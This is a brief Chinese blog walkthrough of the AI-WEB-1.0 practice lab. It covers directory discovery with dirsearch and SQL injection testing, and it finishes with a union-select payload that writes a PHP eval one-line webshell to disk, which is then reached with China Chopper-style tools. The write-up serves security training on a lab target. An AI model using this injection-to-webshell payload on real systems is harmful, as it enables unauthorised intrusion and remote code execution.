CSDN AI-WEB-1.0 攻略

找到一个目标靶场的IP , 这里以172.16.1.98 为例

1、使用命令 /robots.txt 来确定目录

2、分别测试两个文件

均无法访问,可返回其根目录查询

3、到根目录,出现搜索框

4、输入ID为1

5、使用虚拟机kali的终端

搜索命令 dirsearch -u http://172.16.1.98/m3diNf0/

6、搜索文件 info.php

即可得到 WWW 所在的根目录

7、确定闭合方式 1'

8、确定字段

1' order by 3#

9、注入一句话"木马"

1' union select 1,2 ,'<?php @eval($_POST['cmd']);?>' into outfile '绝对路径' #

9、查看文件,木马是否注入成功

搜索 /s /up /sis.php

10、使用中国蚁键/中国菜刀等工具,进入该系统

++即可成功获取信息++

安全

网络安全人人有责,切勿知法犯法

相关推荐
zhaoyang030112 分钟前
css3笔记 (1) 自用
前端·javascript·css·vue.js·笔记·html·css3
珎珎啊16 分钟前
CSS3 常用功能详细使用指南
前端·css·css3
struggle20252 小时前
RushDB开源程序 是现代应用程序和 AI 的即时数据库。建立在 Neo4j 之上
数据库·typescript·neo4j
moxiaoran57533 小时前
uni-app萌宠案例学习笔记--页面布局和CSS样式设置
前端·css·uni-app
伤不起bb4 小时前
Redis 哨兵模式
数据库·redis·缓存
卑微的Coder4 小时前
Redis Set集合命令、内部编码及应用场景(详细)
java·数据库·redis
2501_915373884 小时前
Redis线程安全深度解析:单线程模型的并发智慧
数据库·redis·安全
呼拉拉呼拉4 小时前
Redis知识体系
数据库·redis·缓存·知识体系
霖檬ing4 小时前
Redis——主从&哨兵配置
数据库·redis·缓存
CrissChan4 小时前
Pycharm 函数注释
java·前端·pycharm